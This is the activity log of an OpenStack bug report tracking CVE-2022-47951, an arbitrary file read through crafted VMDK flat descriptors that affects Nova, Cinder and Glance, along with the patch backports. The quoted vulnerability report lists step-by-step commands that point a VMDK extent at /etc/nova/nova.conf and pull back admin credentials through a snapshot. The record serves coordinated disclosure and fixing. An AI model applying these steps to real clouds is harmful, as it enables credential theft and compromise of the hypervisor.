| 2022-11-10 13:41:54 |
Jeremy Stanley |
bug |
|
|
added bug |
| 2022-11-10 13:42:26 |
Jeremy Stanley |
bug |
|
|
added subscriber Nova Core security contacts |
| 2022-11-10 13:42:51 |
Jeremy Stanley |
bug |
|
|
added subscriber Arnaud Morin |
| 2022-11-10 13:43:29 |
Jeremy Stanley |
bug task added |
|
ossa |
|
| 2022-11-10 13:43:36 |
Jeremy Stanley |
ossa: status |
New |
Incomplete |
|
| 2022-11-10 13:48:49 |
Jeremy Stanley |
bug |
|
|
added subscriber Pierre Libeau |
| 2022-11-10 13:49:02 |
Jeremy Stanley |
bug |
|
|
added subscriber Damien RANNOU |
| 2022-11-10 13:49:18 |
Jeremy Stanley |
bug |
|
|
added subscriber Guillaume Espanel |
| 2022-11-10 14:57:06 |
Dan Smith |
bug |
|
|
added subscriber Brian Rosmaita |
| 2022-11-10 18:41:54 |
Dan Smith |
attachment added |
|
nova-1996188.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5630408/+files/nova-1996188.patch |
|
| 2022-11-11 03:06:41 |
melanie witt |
bug |
|
|
added subscriber melanie witt |
| 2022-11-11 16:16:59 |
Dan Smith |
attachment added |
|
nova-1996188-2.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5630610/+files/nova-1996188-2.patch |
|
| 2022-11-12 18:12:55 |
Brian Rosmaita |
bug task added |
|
cinder |
|
| 2022-11-12 18:15:35 |
Brian Rosmaita |
attachment added |
|
Cinder patch for bug-1996188 https://bugs.launchpad.net/cinder/+bug/1996188/+attachment/5630660/+files/cinder-1996188.patch |
|
| 2022-11-14 14:33:24 |
Dan Smith |
attachment added |
|
glance-1996188.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5630734/+files/glance-1996188.patch |
|
| 2022-11-14 15:42:26 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-2.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5630740/+files/cinder-1996188-2.patch |
|
| 2022-11-14 15:46:25 |
Jeremy Stanley |
bug |
|
|
added subscriber Cinder Core security contacts |
| 2022-11-18 15:15:17 |
Dan Smith |
attachment added |
|
glance-1996188-2.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5631413/+files/glance-1996188-2.patch |
|
| 2022-11-23 22:38:47 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-3.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5632388/+files/cinder-1996188-3.patch |
|
| 2022-11-30 04:07:32 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-4.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5633287/+files/cinder-1996188-4.patch |
|
| 2022-12-02 15:53:22 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-5.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5633959/+files/cinder-1996188-5.patch |
|
| 2022-12-08 14:02:43 |
Brian Rosmaita |
bug |
|
|
added subscriber Glance Core security contacts |
| 2022-12-08 14:03:33 |
Brian Rosmaita |
bug task added |
|
glance |
|
| 2022-12-14 20:13:54 |
Brian Rosmaita |
attachment removed |
Cinder patch for bug-1996188 https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5630660/+files/cinder-1996188.patch |
|
|
| 2022-12-14 20:14:13 |
Brian Rosmaita |
attachment removed |
cinder-1996188-2.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5630740/+files/cinder-1996188-2.patch |
|
|
| 2022-12-14 20:14:27 |
Brian Rosmaita |
attachment removed |
cinder-1996188-3.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5632388/+files/cinder-1996188-3.patch |
|
|
| 2022-12-14 20:14:39 |
Brian Rosmaita |
attachment removed |
cinder-1996188-4.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5633287/+files/cinder-1996188-4.patch |
|
|
| 2022-12-14 20:14:50 |
Brian Rosmaita |
attachment removed |
cinder-1996188-5.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5633959/+files/cinder-1996188-5.patch |
|
|
| 2022-12-14 20:25:59 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-master.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5635638/+files/cinder-1996188-master.patch |
|
| 2022-12-14 20:26:46 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-zed.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5635639/+files/cinder-1996188-zed.patch |
|
| 2022-12-14 20:27:16 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-yoga.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5635640/+files/cinder-1996188-yoga.patch |
|
| 2022-12-14 20:27:55 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-xena.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5635641/+files/cinder-1996188-xena.patch |
|
| 2022-12-14 20:28:37 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-wallaby.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5635642/+files/cinder-1996188-wallaby.patch |
|
| 2022-12-19 17:25:07 |
Abhishek Kekane |
attachment added |
|
glance-1996188-master.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5636450/+files/glance-1996188-master.patch |
|
| 2022-12-19 17:25:49 |
Abhishek Kekane |
attachment added |
|
glance-1996188-zed.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5636451/+files/glance-1996188-zed.patch |
|
| 2022-12-19 17:26:25 |
Abhishek Kekane |
attachment added |
|
glance-1996188-yoga.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5636452/+files/glance-1996188-yoga.patch |
|
| 2022-12-19 17:27:01 |
Abhishek Kekane |
attachment added |
|
glance-1996188-xena.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5636453/+files/glance-1996188-xena.patch |
|
| 2022-12-19 17:27:43 |
Abhishek Kekane |
attachment added |
|
glance-1996188-wallaby.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5636454/+files/glance-1996188-wallaby.patch |
|
| 2022-12-19 17:28:51 |
Abhishek Kekane |
attachment added |
|
glance-1996188-victoria.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5636455/+files/glance-1996188-victoria.patch |
|
| 2022-12-19 17:29:19 |
Abhishek Kekane |
attachment added |
|
glance-1996188-ussuri.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5636456/+files/glance-1996188-ussuri.patch |
|
| 2022-12-19 17:29:49 |
Abhishek Kekane |
attachment added |
|
glance-1996188-train.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5636457/+files/glance-1996188-train.patch |
|
| 2022-12-19 19:42:20 |
Jeremy Stanley |
ossa: status |
Incomplete |
Confirmed |
|
| 2022-12-19 19:42:24 |
Jeremy Stanley |
ossa: importance |
Undecided |
High |
|
| 2022-12-19 19:42:28 |
Jeremy Stanley |
ossa: assignee |
|
Jeremy Stanley (fungi) |
|
| 2022-12-24 19:07:40 |
Jeremy Stanley |
ossa: status |
Confirmed |
In Progress |
|
| 2022-12-25 14:18:15 |
Jeremy Stanley |
summary |
Arbitrary file access through custom VMDK flat descriptor |
Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951) |
|
| 2022-12-25 14:19:36 |
Jeremy Stanley |
cve linked |
|
2022-47951 |
|
| 2023-01-10 18:25:12 |
Dan Smith |
attachment added |
|
Xena-specific backport https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5640530/+files/nova-1996188-xena.patch |
|
| 2023-01-11 14:59:43 |
Brian Rosmaita |
attachment removed |
cinder-1996188-wallaby.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5635642/+files/cinder-1996188-wallaby.patch |
|
|
| 2023-01-11 15:00:59 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-wallaby.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5640733/+files/cinder-1996188-wallaby.patch |
|
| 2023-01-14 14:35:08 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-victoria.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5641359/+files/cinder-1996188-victoria.patch |
|
| 2023-01-16 21:31:24 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-ussuri.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5641756/+files/cinder-1996188-ussuri.patch |
|
| 2023-01-16 21:31:55 |
Brian Rosmaita |
attachment added |
|
cinder-1996188-train.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5641757/+files/cinder-1996188-train.patch |
|
| 2023-01-17 21:55:31 |
Jeremy Stanley |
ossa: status |
In Progress |
Fix Committed |
|
| 2023-01-17 23:40:08 |
Jeremy Stanley |
bug |
|
|
added subscriber Mohammed Naser |
| 2023-01-19 14:19:36 |
Jeremy Stanley |
bug |
|
|
added subscriber Thomas Goirand |
| 2023-01-19 17:01:28 |
Jeremy Stanley |
bug |
|
|
added subscriber Nathanael Burton |
| 2023-01-20 18:32:05 |
Thomas Goirand |
attachment added |
|
cve-2022-47951-nova-stable-victoria.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5642746/+files/cve-2022-47951-nova-stable-victoria.patch |
|
| 2023-01-20 19:12:02 |
Dan Smith |
attachment added |
|
nova-1996188-xena-2.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5642750/+files/nova-1996188-xena-2.patch |
|
| 2023-01-23 12:46:37 |
Jeremy Stanley |
bug |
|
|
added subscriber Kurt Garloff |
| 2023-01-23 14:09:00 |
Jeremy Stanley |
bug |
|
|
added subscriber Jonas Schäfer |
| 2023-01-24 13:06:35 |
Jeremy Stanley |
bug |
|
|
added subscriber Felix Huettner |
| 2023-01-24 13:57:10 |
Felix Huettner |
attachment added |
|
cve-2022-47951-cinder-stable-queens-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643142/+files/cve-2022-47951-cinder-stable-queens-felix.patch |
|
| 2023-01-24 13:57:35 |
Felix Huettner |
attachment added |
|
cve-2022-47951-cinder-stable-rocky-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643143/+files/cve-2022-47951-cinder-stable-rocky-felix.patch |
|
| 2023-01-24 13:57:52 |
Felix Huettner |
attachment added |
|
cve-2022-47951-cinder-stable-stein-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643144/+files/cve-2022-47951-cinder-stable-stein-felix.patch |
|
| 2023-01-24 13:58:09 |
Felix Huettner |
attachment added |
|
cve-2022-47951-cinder-stable-ussuri-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643145/+files/cve-2022-47951-cinder-stable-ussuri-felix.patch |
|
| 2023-01-24 13:58:31 |
Felix Huettner |
attachment added |
|
cve-2022-47951-nova-stable-queens-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643146/+files/cve-2022-47951-nova-stable-queens-felix.patch |
|
| 2023-01-24 13:58:56 |
Felix Huettner |
attachment added |
|
cve-2022-47951-nova-stable-rocky-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643147/+files/cve-2022-47951-nova-stable-rocky-felix.patch |
|
| 2023-01-24 13:59:15 |
Felix Huettner |
attachment added |
|
cve-2022-47951-nova-stable-stein-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643148/+files/cve-2022-47951-nova-stable-stein-felix.patch |
|
| 2023-01-24 13:59:35 |
Felix Huettner |
attachment added |
|
cve-2022-47951-nova-stable-train-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643149/+files/cve-2022-47951-nova-stable-train-felix.patch |
|
| 2023-01-24 13:59:49 |
Felix Huettner |
attachment added |
|
cve-2022-47951-nova-stable-ussuri-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643150/+files/cve-2022-47951-nova-stable-ussuri-felix.patch |
|
| 2023-01-24 14:00:09 |
Felix Huettner |
attachment added |
|
cve-2022-47951-nova-stable-victoria-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643151/+files/cve-2022-47951-nova-stable-victoria-felix.patch |
|
| 2023-01-24 14:00:29 |
Felix Huettner |
attachment added |
|
cve-2022-47951-nova-stable-wallaby-felix.patch https://bugs.launchpad.net/nova/+bug/1996188/+attachment/5643152/+files/cve-2022-47951-nova-stable-wallaby-felix.patch |
|
| 2023-01-24 15:00:07 |
Jeremy Stanley |
description |
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2023-02-08 and will be made
public by or on that date even if no fix is identified.
The vulnerability managers received the following report from Sébastien Meriot with OVH via encrypted E-mail:
Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).
Here is the details :
By using a VMDK file, you can dump any file on the hypervisor.
1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
6. Download the image: openstack image save --file leak-instance-image leak-instance-image
7. You get access to the nova.conf file content and you can get access to the openstack admin creds.
We are working on a fix and would be happy to share it with you if needed.
We think it does affect Nova but it could affect Glance as well. We're not sure yet.
[postscript per Arnaud Morin (amorin) in IRC]
cinder seems also affected |
The vulnerability managers received the following report from Sébastien Meriot with OVH via encrypted E-mail:
Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).
Here is the details :
By using a VMDK file, you can dump any file on the hypervisor.
1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
6. Download the image: openstack image save --file leak-instance-image leak-instance-image
7. You get access to the nova.conf file content and you can get access to the openstack admin creds.
We are working on a fix and would be happy to share it with you if needed.
We think it does affect Nova but it could affect Glance as well. We're not sure yet.
[postscript per Arnaud Morin (amorin) in IRC]
cinder seems also affected |
|
| 2023-01-24 15:00:14 |
Jeremy Stanley |
information type |
Private Security |
Public Security |
|
| 2023-01-24 15:01:19 |
OpenStack Infra |
glance: status |
New |
In Progress |
|
| 2023-01-24 15:02:20 |
OpenStack Infra |
cinder: status |
New |
In Progress |
|
| 2023-01-24 15:16:27 |
Jeremy Stanley |
summary |
Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951) |
[OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951) |
|
| 2023-01-24 15:16:35 |
Christian Rohmann |
bug |
|
|
added subscriber Christian Rohmann |
| 2023-01-24 15:51:55 |
OpenStack Infra |
ossa: status |
Fix Committed |
Fix Released |
|
| 2023-01-24 22:59:57 |
OpenStack Infra |
glance: status |
In Progress |
Fix Released |
|
| 2023-01-24 23:07:14 |
OpenStack Infra |
tags |
|
in-stable-zed |
|
| 2023-01-25 02:28:09 |
OpenStack Infra |
tags |
in-stable-zed |
in-stable-yoga in-stable-zed |
|
| 2023-01-25 09:41:36 |
Luis Fernández Álvarez |
bug |
|
|
added subscriber Luis Fernández Álvarez |
| 2023-01-25 16:07:17 |
OpenStack Infra |
tags |
in-stable-yoga in-stable-zed |
in-stable-xena in-stable-yoga in-stable-zed |
|
| 2023-01-25 22:25:45 |
Kabanov Oleg |
bug |
|
|
added subscriber Kabanov Oleg |
| 2023-01-26 14:48:10 |
OpenStack Infra |
tags |
in-stable-xena in-stable-yoga in-stable-zed |
in-stable-victoria in-stable-xena in-stable-yoga in-stable-zed |
|
| 2023-01-27 13:46:02 |
Sylvain Bauza |
nova: importance |
Undecided |
Critical |
|
| 2023-01-27 13:46:07 |
Sylvain Bauza |
nova: status |
New |
Confirmed |
|
| 2023-01-27 13:47:34 |
Sylvain Bauza |
nova: status |
Confirmed |
Fix Released |
|
| 2023-01-27 15:17:37 |
Brian Rosmaita |
cinder: importance |
Undecided |
Critical |
|
| 2023-01-27 15:17:44 |
Brian Rosmaita |
cinder: status |
In Progress |
Fix Released |
|
| 2023-02-01 02:06:39 |
OpenStack Infra |
tags |
in-stable-victoria in-stable-xena in-stable-yoga in-stable-zed |
in-stable-victoria in-stable-wallaby in-stable-xena in-stable-yoga in-stable-zed |
|
| 2023-02-16 01:42:19 |
OpenStack Infra |
tags |
in-stable-victoria in-stable-wallaby in-stable-xena in-stable-yoga in-stable-zed |
in-stable-ussuri in-stable-victoria in-stable-wallaby in-stable-xena in-stable-yoga in-stable-zed |
|
| 2023-03-07 16:58:37 |
OpenStack Infra |
tags |
in-stable-ussuri in-stable-victoria in-stable-wallaby in-stable-xena in-stable-yoga in-stable-zed |
in-stable-train in-stable-ussuri in-stable-victoria in-stable-wallaby in-stable-xena in-stable-yoga in-stable-zed |
|
| 2023-03-10 06:19:57 |
Abhishek Kekane |
glance: assignee |
|
Dan Smith (danms) |
|
